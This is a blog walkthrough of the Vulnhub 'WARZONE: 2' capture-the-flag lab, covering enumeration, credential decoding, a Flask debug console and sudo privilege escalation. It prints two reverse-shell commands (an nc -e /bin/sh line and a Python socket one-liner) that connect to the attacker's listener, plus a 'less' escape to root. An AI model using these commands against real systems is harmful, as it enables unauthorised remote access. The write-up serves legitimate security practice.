---
layout: post
title:  "Vulnhub - WARZONE: 2"
date:   2020-11-14 21:00:00 +1100
category: hacking
---

## Introduction
*Enumeration, Flask, Port Forwarding, GTFObins  
Created and Tested in Virtual box (NAT network)  
Hint : lowercase letters*  

This is [WARZONE: 2](https://www.vulnhub.com/entry/warzone-2,598/) from Vulnhub. 

## Ports
We've got 3 ports - FTP, SSH and 1337. 
What's 1337? nmap doesn't give us much, so let's netcat it:

{% highlight shell %}
root@kali:/opt/vulnhub/warzone2# nc 192.168.1.144 1337
# WARZONE 2 # WARZONE 2 # WARZONE 2 #
{SECRET SYSTEM REMOTE ACCESS}
{% endhighlight %}

Okay it's the **SECRET SYSTEM REMOTE ACCESS**. Let's come back to this in a minute.

## FTP
We have anonymous access, and there are three PNG images in the folder. One called *username*, one called *password* and one called *token*. The password and username files are images of semaphore flag messages. We can decode them by referring to a semaphore chart, and we derive the combination:

>semaphore:signalperson

The token PNG file gives instructions on how to generate a token; essentially it's a SHA256 hash of the username and password - it comes to:

>833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26

## 1337
With our credentials above we can log in to the secret system using netcat. We can only do 3 commands:

{% highlight shell %}
Success Login
[SIGNALS] { ls, pwd, nc}
[semaphore] > pwd
[+] Recognized signal
[+] sending......
/home/flagman
[semaphore] > ls
[+] Recognized signal
[+] sending......
{% endhighlight %}

We can't do *ls* with a directory, so we can't list files outside of */home/flagman*. However we can do *nc* with extras, so we can do:

``
[semaphore] > nc -e /bin/sh 192.168.1.77 1234
``

And with a listener we get our first shell.

## www-data
With some enumeration as *www-data* we can find an SSH password for flagman:

{% highlight shell %}
www-data@warzone2:/home/flagman/warzone2-socket-server$ ls -lash
ls -lash
total 20K
4.0K drwxr-xr-x  2 flagman flagman 4.0K Nov  8 18:25 .
4.0K drwxr-xr-x 16 flagman flagman 4.0K Nov  8 19:17 ..
4.0K -rw-r--r--  1 flagman flagman   34 Nov  8 16:27 .mysshpassword
4.0K -rwxr-xr-x  1 flagman root    3.7K Nov  8 14:59 warzone2.jar
4.0K -rwxr-xr-x  1 flagman flagman   72 Nov  8 17:50 warzone2.sh
www-data@warzone2:/home/flagman/warzone2-socket-server$ cat .my	
cat .mysshpassword 
Did you know that i_hate_signals!
{% endhighlight %}

## Flagman
Now we can SSH in as flagman. Once we're there, we find that *flagman* can run a command as *admiral*; so let's do it:

{% highlight shell %}
User flagman may run the following commands on warzone2:
    (admiral) NOPASSWD: /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py
    
    
    
lagman@warzone2:/home/admiral/warzone2-app$ sudo -u admiral /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py
 * Serving Flask app "wrz2-app" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: on
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 182-647-262
{% endhighlight %}

So, what is this? It's a Flask app running in debug mode on localhost. We need to get access to it, so we can set up a port forward in Kali:

``
root@kali:/opt/vulnhub/warzone2# ssh -L 9999:127.0.0.1:5000 flagman@192.168.1.144
``

And then in Kali we can visit http://localhost:9999/ and get access to the webapp.

## Flask
The front page doesn't give much away:

>    Warzone 2  
Under construction  
search result :None 

I run a gobuster on localhost:

``
root@kali:/opt/vulnhub/warzone2# gobuster dir -u http://localhost:9999 -w /usr/share/seclists/Discovery/Web-Content/common.txt 
``

And this finds a directory called */console*. We need to enter the PIN we found earlier, and then we can enter python commands into the console.

I use the Pentestmonkey python reverse shell code with a new listener:

``
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
``

And now I have a shell as *admiral*. 

## Admiral to root
Admiral can run a command as root; specifically, he can use *less* to read */var/public/warzone-rules.txt*. We can exploit this per [GTFOBins](https://gtfobins.github.io/gtfobins/less/#sudo) by running the command and then running **!/bin/sh**.

{% highlight shell %}
admiral@warzone2:/dev/shm$ sudo -u root /usr/bin/less /var/public/warzone-rules.txt
sudo -u root /usr/bin/less /var/public/warzone-rules.txt
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
Desktop  Documents  Downloads  Music  Pictures	Public	Templates  Videos
# cd Desktop
cd Desktop
# ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x  2 root root 4.0K Nov  8 16:41 .
4.0K drwx------ 16 root root 4.0K Nov 14 04:09 ..
4.0K -r--------  1 root root  332 Nov  8 09:59 gold.txt
# cat gold.txt
cat gold.txt
         (                  )
       (  \                /  )
        \  \              /  /
         \  \    ____    /  /
          \  \_ //  \\ _/  /
           \   //    \\   /
            \_(# GOLD #)_/
               \\    //
                \\__//

    FLAG : {# GOLD MEDAL #}
    NAME : WARZONE 2
    BY   : Alienum with <3
{% endhighlight %}

## Final Thoughts
I *really* enjoyed this one, it was a cracker. Easily my favourite since Nully 1. Thanks Alienum.
